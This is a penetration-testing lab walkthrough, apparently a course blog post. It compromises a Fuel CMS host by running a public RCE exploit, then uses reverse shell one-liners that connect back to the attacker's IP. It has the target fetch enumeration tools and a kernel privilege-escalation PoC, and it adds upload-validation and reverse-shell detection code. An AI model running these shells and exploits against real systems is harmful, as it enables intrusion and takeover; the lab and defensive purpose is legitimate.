Penetration Testing Basic Techniques, Chapter 3 (003)


Posted by nathan2009729 on 2023-03-26

For the next exercise, connect to the remote Kali box first and scan from there; otherwise the target cannot be reached:

┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.253.19 -g 90%
Autoselecting keyboard map 'en-us' from locale
Connection established using plain RDP.

Once on the remote desktop, the usual routine: a quick full-port nmap scan first, then a detailed one on the open ports:

┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.120
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 01:01 EST
Nmap scan report for 172.16.1.120
Host is up (0.046s latency).
Not shown: 65527 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
53/tcp   open  domain
110/tcp  open  pop3
139/tcp  open  netbios-ssn
143/tcp  open  imap
445/tcp  open  microsoft-ds
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 27.37 seconds

┌──(root㉿kali)-[~]
└─# nmap -p22,25,53,110,139,143,445,8081 172.16.1.120 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 01:02 EST
Nmap scan report for 172.16.1.120
Host is up (0.017s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d236aef714f27c5dba262e9b405355c5 (RSA)
|   256 1b8a0440b432f13f11c824e8cbaf771f (ECDSA)
|_  256 704228800dd468fb069c6ed304dac161 (ED25519)
25/tcp   open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FuleCMS
| Not valid before: 2020-08-20T16:26:53
|_Not valid after:  2030-08-18T16:26:53
|_smtp-commands: FuleCMS, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp   open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE UIDL RESP-CODES PIPELINING TOP CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more capabilities have LOGINDISABLEDA0001 listed post-login SASL-IR IDLE ID OK Pre-login LOGIN-REFERRALS LITERAL+
445/tcp  open  netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
8081/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/fuel/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 3.16 (93%), Linux 4.4 (93%), Linux 3.10 - 3.16 (92%), Linux 3.13 (90%), Linux 3.16 - 4.6 (89%), Linux 3.2 - 4.9 (89%), Linux 4.2 (89%), Linux 3.2 - 3.8 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts:  FuleCMS, FULECMS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m02s, deviation: 4h37m07s, median: -3s
|_nbstat: NetBIOS name: FULECMS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: fulecms
|   NetBIOS computer name: FULECMS\x00
|   Domain name: \x00
|   FQDN: fulecms
|_  System time: 2023-03-12T14:03:07+08:00
| smb2-time:
|   date: 2023-03-12T06:03:06
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 25/tcp)
HOP RTT      ADDRESS
1   61.59 ms 192.168.200.1
2   10.17 ms 172.16.1.120

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.94 seconds

Port 8081 has a /fuel directory (the robots.txt entry), so try opening http://172.16.1.120:8081/fuel:

It is an uncommon CMS, so first look up its default credentials:

Try them:

They actually work:

Check the version number:

Search exploit-db:

Look at one of them:

With the EDB-ID (50477) from the page above, the rest can be done locally: copy the PoC over and run it, which gets a shell:

┌──(root㉿kali)-[~]
└─# cd /home/kali/PT_day3

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# searchsploit -m 50477
  Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
      URL: https://www.exploit-db.com/exploits/50477
     Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PT_day3/50477.py



┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 50477.py -u http://172.16.1.120:8081
[+]Connecting...
Enter Command $whoami
systemwww-data

Look around to see what is there:

Enter Command $ls -l
systemtotal 56
-rwxrwxr-x 1 www-data www-data  1427 Mar 31  2017 README.md
drwxrwxr-x 9 www-data www-data  4096 Mar 31  2017 assets
-rwxrwxr-x 1 www-data www-data   193 Mar 31  2017 composer.json
-rwxrwxr-x 1 www-data www-data  6502 Mar 31  2017 contributing.md
drwxrwxr-x 9 www-data www-data  4096 Mar 31  2017 fuel
-rwxrwxr-x 1 www-data www-data 11321 Aug 21  2020 index.html
-rwxrwxr-x 1 www-data www-data 11802 Mar 31  2017 index.php
-rwxrwxr-x 1 www-data www-data    20 Aug 21  2020 phpinfo.php
-rwxrwxr-x 1 www-data www-data    30 Mar 31  2017 robots.txt


Enter Command $ls ./assets -l
systemtotal 28
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 cache
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 css
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 docs
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 images
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 js
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 pdf
drwxrwxr-x 2 www-data www-data 4096 Mar 31  2017 swf

There is an upload page, so open Burp Suite in preparation:

Look for the reverse shell scripts on the local machine:

┌──(root㉿kali)-[~]
└─# cd /usr/share/webshells

┌──(root㉿kali)-[/usr/share/webshells]
└─# ls -al
total 40
drwxr-xr-x   8 root root  4096 Aug  8  2022 .
drwxr-xr-x 342 root root 12288 Feb 19 02:19 ..
drwxr-xr-x   2 root root  4096 Aug  8  2022 asp
drwxr-xr-x   2 root root  4096 Aug  8  2022 aspx
drwxr-xr-x   2 root root  4096 Aug  8  2022 cfm
drwxr-xr-x   2 root root  4096 Aug  8  2022 jsp
lrwxrwxrwx   1 root root    19 Aug  8  2022 laudanum -> /usr/share/laudanum
drwxr-xr-x   2 root root  4096 Aug  8  2022 perl
drwxr-xr-x   3 root root  4096 Dec 10 02:17 php

┌──(root㉿kali)-[/usr/share/webshells]
└─# cd php

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# ls -al
total 196
drwxr-xr-x 3 root root   4096 Dec 10 02:17 .
drwxr-xr-x 8 root root   4096 Aug  8  2022 ..
drwxr-xr-x 2 root root   4096 Aug  8  2022 findsocket
-rw-r--r-- 1 root root   2800 Nov 20  2021 php-backdoor.php
-rwxr-xr-x 1 root root   5496 Dec 10 00:42 php-reverse-shell.php
-rwxr-xr-x 1 root root   5500 Dec 10 02:17 php-reverse-shell.png
-rw-r--r-- 1 root root  13585 Nov 20  2021 qsd-php-backdoor.php
-rw-r--r-- 1 root root    328 Nov 20  2021 simple-backdoor.php
-rwxrwxrwx 1 root root 147181 Dec 10 01:35 test1.jpeg

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# cp php-reverse-shell.php /home/kali/PT_day3

┌──(root㉿kali)-[/usr/share/webshells/php]
└─# cd /home/kali/PT_day3

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 52
drwxr-xr-x  2 root root 4096 Mar 12 03:19 .
drwxr-xr-x 22 kali kali 4096 Mar 12 03:18 ..
-rw-r--r--  1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x  1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x  1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x  1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x  1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x  1 root root  996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x  1 root root 5496 Mar 12 03:19 php-reverse-shell.php

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim php-reverse-shell.php

Change the following two lines:

Rename the file so the upload is not rejected:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv php-reverse-shell.php php-reverse-shell.jpg

Try uploading it:

During the upload, because Burp Suite's intercept is on, the request is shown.

In figure 2 above you can see the uploaded jpg, which is really PHP, so change the extension back to php as circled in red in the figure below:

After renaming and pressing Forward in Burp, the following screen appears; now find where the uploaded file ended up:

But it cannot be found, because:
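The upload bypass attempted above (PHP renamed to .jpg, then the extension switched back to .php in the proxy) only works when the server trusts the client-supplied file name. As an added example, not code from this post or from Fuel CMS, the Python validator below shows the server-side checks that reject each step of it: an allowlisted extension, magic bytes that must match that extension, a scan for script markers inside the image data, and a stored name generated by the server. The sample uploads are constructed.

```python
import os
import secrets

# Allowlisted extensions with the leading bytes a genuine file must have.
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# Script markers that should never appear in an image, even after a valid
# header (a polyglot that would pass a magic-byte check alone).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

def validate_upload(client_name, data):
    """Return (accepted, reason, stored_name).

    The client-supplied name is used only to pick an allowlisted extension;
    the stored name is generated server-side, so a name rewritten in transit
    (for example .jpg changed back to .php in a proxy) cannot choose the
    handler the web server will run the file with.
    """
    ext = os.path.splitext(client_name)[1].lower().lstrip(".")
    if ext not in ALLOWED:
        return False, "extension not allowed", None
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script marker inside image data", None
    return True, "ok", f"{secrets.token_hex(8)}.{ext}"

# Constructed sample uploads (name, first bytes); not files from the post.
PHP_SHELL_AS_JPG = ("php-reverse-shell.jpg", b"<?php // script body omitted")
NAME_SWITCHED_BACK = ("php-reverse-shell.php", b"<?php // script body omitted")
REAL_JPEG = ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16)
POLYGLOT = ("photo.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"<?php echo 1; ?>")

if __name__ == "__main__":
    for name, blob in (PHP_SHELL_AS_JPG, NAME_SWITCHED_BACK, REAL_JPEG, POLYGLOT):
        print(name, validate_upload(name, blob)[:2])
```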

So fall back to 50477 again and use the shell it provides to spawn a reverse shell:

Start the listener first:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nc -lvnp 1234
listening on [any] 1234 ...

Enter the command copied from the web page:

Enter Command $php -r '$sock=fsockopen("192.168.200.6",1234);exec("sh <&3 >&3 2>&3");'
<br />
<b>Parse error</b>:  syntax error, unexpected '$sock' (T_VARIABLE) in <b>/var/www/html/fuel/modules/fuel/controllers/Pages.php(924) : runtime-created function</b> on line <b>1</b><br />

So the $ character cannot be passed through this PoC.

Try another one:

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 50477.py -u http://172.16.1.120:8081
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.200.6 1234 >/tmp/f

The listener receives the connection:

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.6] from (UNKNOWN) [172.16.1.120] 57974
sh: 0: can't access tty; job control turned off
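Both one-liners tried above leave a distinctive command line in process telemetry, and a web server account (www-data, uid 33) spawning an outbound interactive shell is itself a strong signal. The detection logic below is an added example, not from the original post: it runs rules for the mkfifo/nc relay and the php -r fsockopen variant over constructed sample events, and also covers bash's /dev/tcp redirection, which is not in the post but is the common third form of the same technique.

```python
import re

# Constructed sample process-execution events, as an EDR or auditd pipeline
# would deliver them after parsing; uid 33 is www-data on Ubuntu. The first
# two command lines are the ones used in the walkthrough above.
SAMPLE_EVENTS = [
    {"uid": 33, "comm": "sh",
     "cmd": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.200.6 1234 >/tmp/f"},
    {"uid": 33, "comm": "php",
     "cmd": "php -r '$sock=fsockopen(\"192.168.200.6\",1234);exec(\"sh <&3 >&3 2>&3\");'"},
    {"uid": 33, "comm": "sh", "cmd": "ls -l /var/www/html/assets"},
    {"uid": 1000, "comm": "bash", "cmd": "mkfifo /tmp/build.pipe"},
]

# Each rule requires the full relay shape, not just a suspicious word, so
# ordinary admin use of mkfifo or nc does not fire.
RULES = {
    "fifo_shell_relay": re.compile(
        r"mkfifo\s+\S+.*\|\s*(sh|bash|dash)\b.*\|\s*(nc|ncat|netcat)\b"),
    "php_socket_exec": re.compile(
        r"php\s+-r\b.*fsockopen\(.*\b(exec|system|passthru|shell_exec)\("),
    # bash /dev/tcp redirection: not in the post, added as the third variant.
    "bash_dev_tcp": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
}

# Service accounts that should never open an outbound interactive shell.
WEB_SERVICE_UIDS = {33}

def detect_reverse_shells(events):
    """Return (event index, rule name, severity) for every matching event."""
    hits = []
    for i, ev in enumerate(events):
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                sev = "critical" if ev["uid"] in WEB_SERVICE_UIDS else "high"
                hits.append((i, name, sev))
    return hits

if __name__ == "__main__":
    for idx, rule, sev in detect_reverse_shells(SAMPLE_EVENTS):
        print(f"[{sev}] event {idx}: {rule}: {SAMPLE_EVENTS[idx]['cmd']}")
```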

Check the attacking machine; the enumeration tools LinEnum and linpeas should have been downloaded earlier.

┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# cd /home/kali

┌──(root㉿kali)-[/home/kali]
└─# ls -al
total 972
drwxr-xr-x 22 kali kali   4096 Mar 12 03:56 .
drwxr-xr-x  4 root root   4096 Jan 15 00:59 ..
-rw-r--r--  1 kali kali    220 Aug  8  2022 .bash_logout
-rw-r--r--  1 kali kali   5551 Aug  8  2022 .bashrc
-rw-r--r--  1 kali kali   3526 Aug  8  2022 .bashrc.original
drwx------  6 kali kali   4096 Feb 19 07:36 .BurpSuite
drwxr-xr-x 10 kali kali   4096 Feb 19 04:23 .cache
drwxr-xr-x 15 kali kali   4096 Feb 27 06:51 .config
-rw-r--r--  1 kali kali   4715 Mar 11 03:16 cyberlab.ovpn
drwxr-xr-x  2 kali kali   4096 Dec 10 01:17 Desktop
-rw-r--r--  1 kali kali     35 Nov  7 06:23 .dmrc
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Documents
drwxr-xr-x  2 kali kali   4096 Mar 11 03:17 Downloads
-rw-r--r--  1 kali kali  11759 Aug  8  2022 .face
lrwxrwxrwx  1 kali kali      5 Aug  8  2022 .face.icon -> .face
drwx------  3 kali kali   4096 Nov  7 06:23 .gnupg
-rw-------  1 kali kali      0 Nov  7 06:23 .ICEauthority
drwxr-xr-x  4 kali kali   4096 Feb 19 05:32 .java
-rw-r--r--  1 root root 776167 Apr 17  2022 linpeas.sh
drwx------  3 kali kali   4096 Nov  7 06:23 .local
drwx------  5 kali kali   4096 Nov 13 02:21 .mozilla
drwxr-xr-x 10 kali kali   4096 Feb 26 07:08 .msf4
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Music
-rw-------  1 kali kali    103 Dec 10 22:12 .mysql_history
drwxr-xr-x  2 kali kali   4096 Feb 26 06:43 Pictures
-rw-r--r--  1 kali kali    807 Aug  8  2022 .profile
drwxr-xr-x  2 root root   4096 Mar 12 03:25 PT_day3
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Public
drwx------  2 kali kali   4096 Jan 15 01:42 .ssh
-rw-r--r--  1 kali kali      0 Nov 13 05:38 .sudo_as_admin_successful
drwxr-xr-x  5 kali kali   4096 Dec 31 01:50 target_machine
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Templates
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-clipboard.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-display-svga-x11.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-draganddrop.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-seamless.pid
-rw-r-----  1 kali kali      4 Mar 11 20:19 .vboxclient-vmsvga-session-tty7.pid
drwxr-xr-x  2 kali kali   4096 Nov  7 06:23 Videos
-rw-------  1 kali kali   1988 Dec 10 00:41 .viminfo
drwxr-xr-x  2 kali kali   4096 Nov 13 02:19 vulnOSv2
-rw-------  1 kali kali    249 Mar 12 03:56 .Xauthority
-rw-------  1 kali kali   8520 Mar 12 03:50 .xsession-errors
-rw-------  1 kali kali   9187 Mar 11 08:15 .xsession-errors.old
-rw-------  1 kali kali   8349 Mar 12 01:00 .zsh_history
-rw-r--r--  1 kali kali  10877 Aug  8  2022 .zshrc

┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

The last step above starts a web server so that the target can download the tools:

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@FuleCMS:/var/www/html$ cd /
cd /
www-data@FuleCMS:/$ ls -l
ls -l
total 88
drwxr-xr-x   2 root root  4096 Aug 21  2020 bin
drwxr-xr-x   3 root root  4096 Aug 21  2020 boot
drwxr-xr-x  18 root root  4140 May 29  2021 dev
drwxr-xr-x 100 root root  4096 Aug 21  2020 etc
drwxr-xr-x   4 root root  4096 Aug 21  2020 home
lrwxrwxrwx   1 root root    32 Aug 21  2020 initrd.img -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x  22 root root  4096 Aug 21  2020 lib
drwxr-xr-x   2 root root  4096 Aug 21  2020 lib64
drwx------   2 root root 16384 Aug 21  2020 lost+found
drwxr-xr-x   4 root root  4096 Aug 21  2020 media
drwxr-xr-x   2 root root  4096 Jul 20  2016 mnt
drwxr-xr-x   2 root root  4096 Jul 20  2016 opt
dr-xr-xr-x 171 root root     0 May 29  2021 proc
drwx------   2 root root  4096 May 29  2021 root
drwxr-xr-x  27 root root   900 May 29  2021 run
drwxr-xr-x   2 root root 12288 Aug 21  2020 sbin
drwxr-xr-x   2 root root  4096 Jun 30  2016 snap
drwxr-xr-x   2 root root  4096 Jul 20  2016 srv
dr-xr-xr-x  13 root root     0 May 29  2021 sys
drwxrwxrwt   9 root root  4096 Mar 12 15:52 tmp
drwxr-xr-x  10 root root  4096 Aug 21  2020 usr
drwxr-xr-x  14 root root  4096 Aug 21  2020 var
lrwxrwxrwx   1 root root    29 Aug 21  2020 vmlinuz -> boot/vmlinuz-4.4.0-31-generic
www-data@FuleCMS:/$ cd /tmp
cd /tmp
www-data@FuleCMS:/tmp$ ls
ls
f
systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/linpeas.sh
wget http://192.168.200.6/linpeas.sh
--2023-03-12 16:00:53--  http://192.168.200.6/linpeas.sh
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776167 (758K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 757.98K  2.22MB/s    in 0.3s

2023-03-12 16:00:53 (2.22 MB/s) - 'linpeas.sh' saved [776167/776167]

www-data@FuleCMS:/tmp$ ls -l
ls -l
total 768
prw-r--r-- 1 www-data www-data      0 Mar 12 16:01 f
-rw-r--r-- 1 www-data www-data 776167 Apr 17  2022 linpeas.sh
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/LinEnum.sh
wget http://192.168.200.6/LinEnum.sh
--2023-03-12 16:04:52--  http://192.168.200.6/LinEnum.sh
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K  --.-KB/s    in 0.03s

2023-03-12 16:04:52 (1.27 MB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@FuleCMS:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
www-data@FuleCMS:/tmp$ chmod +x lin*
chmod +x lin*
www-data@FuleCMS:/tmp$ ls -l
ls -l
total 816
-rwxr-xr-x 1 www-data www-data  46631 Mar 12 16:03 LinEnum.sh
prw-r--r-- 1 www-data www-data      0 Mar 12 16:05 f
-rwxr-xr-x 1 www-data www-data 776167 Apr 17  2022 linpeas.sh
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
drwx------ 3 root     root       4096 May 29  2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE

Look for local.txt, the file that is reachable without privilege escalation:

www-data@FuleCMS:/tmp$ find / -name local.txt -print 2>/dev/null
find / -name local.txt -print 2>/dev/null
/home/test/local.txt
www-data@FuleCMS:/tmp$ cat /home/test/local.txt
cat /home/test/local.txt
9c5060aebbfea6f364af27dcd08393cd  -

Run linpeas.sh (the scan output is too long, so it is omitted). It reveals the kernel version:

See whether the following one can be used:

Find the PoC locally:

┌──(kali㉿kali)-[~]
└─$ searchsploit -m 45010
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/45010.c



┌──(kali㉿kali)-[~]
└─$ mv 45010.c cve-2017-16995.c

Likewise, have the target download this PoC:

www-data@FuleCMS:/tmp$ wget http://192.168.200.6/cve-2017-16995.c
wget http://192.168.200.6/cve-2017-16995.c
--2023-03-12 16:35:54--  http://192.168.200.6/cve-2017-16995.c
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'

cve-2017-16995.c    100%[===================>]  12.87K  --.-KB/s    in 0.03s

2023-03-12 16:35:54 (486 KB/s) - 'cve-2017-16995.c' saved [13176/13176]

www-data@FuleCMS:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'